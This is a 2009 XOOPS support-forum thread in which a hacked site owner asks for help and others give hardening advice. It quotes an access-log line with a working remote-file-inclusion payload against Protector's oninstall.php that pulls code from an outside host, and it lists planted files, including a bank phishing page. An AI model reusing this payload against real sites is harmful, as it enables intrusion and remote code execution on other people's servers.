1
CeroKool
HELP! oninstall.php malicious hack
  • 2009/1/28 22:19

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


My webspace was hacked. So, 1and1 sent me this e-mail...

Quote:
67.76.163.60 - - [13/Jan/2009:10:13:24 -0500] "GET
//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($
_GET[a]);function%20v
&a=http://forum.jj-nds-br.de/pbota.txt?&modez=botz HTTP/1.1" 200 5
http://www.cerokool.com "-" "Mozilla/5.0" "-"

--

The above was taken from your access logs. It shows that
//xoops_lib/modules/protector/oninstall.php
was used to perpetrate the hack.

Please contact the developers for this script/application. You will
likely need to install a version update and/or security patch to prevent
further abuse.

Also, reply to this email in acknowledgement of this issue. Failure to
do so can result in your account being locked and possibly terminated.

I disabled the following scripts:


./CK/images/banners/xoops_banner.php
./CK/images/banners/test/natwest/nwolb.com/Login.html
./CK/modules/protector/oninstall.php
./CK/modules/AMS/class/class.php
./CK/themes/default/icons/infos.php
./CK/themes/default/styleMAC.php
./CK/xoops_data/configs/dataconfigs.php
./CK/xoops_lib/modules/protector/oninstall.php
./CK/xoops_lib/modules/protector/security.php


I'm a noob... Help!

2
CeroKool
Update
  • 2009/1/28 22:56

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


If I posted this in the wrong place, sorry.

This might help.
XOOPS Version XOOPS 2.3.2
PHP Version 
4.4.9
MySQL Version 
5.0.67-log
Server API Version 
cgi
OS Version 
Linux

Also, I deleted the folder:
./CK/xoops_lib/modules/protector/

3
McDonald
Re: Update
  • 2009/1/28 23:21

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


What version of Protector did you use?

Was Protector installed outside the document root?

Did you have the .htaccess file uploaded?
See here

4
CeroKool
Tnx 4 da help
  • 2009/1/29 1:14

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


I tried searching. Thanks for directing me.

By the way, are you the same McDonald as in MyTube (XoopsTube)? if so, i haven't been able to access your forum same user name (cerokool). I never got the e-mail and haven't found the option to send it again.

5
McDonald
Re: Tnx 4 da help
  • 2009/1/29 8:33

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


Yes, I'm the same McDonald.
Don't bother about that forum, it will close soon because of bankruptcy of the hoster.

6
iunderwood
Re: HELP! oninstall.php malicious hack

That protector vuln was posted on 1/9: https://xoops.org/modules/news/article.php?storyid=4601

I'm not sure how 1&1 works, but with my webhost, they put my web spaces under a public_html/site directory by default. What I did was then create an unpublic_html directory following a similar structure and put the xoops_data and xoops_lib directories under there.
++I;
Resized Image

Login

Who's Online

205 user(s) are online (127 user(s) are browsing Support Forums)


Members: 0


Guests: 205


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits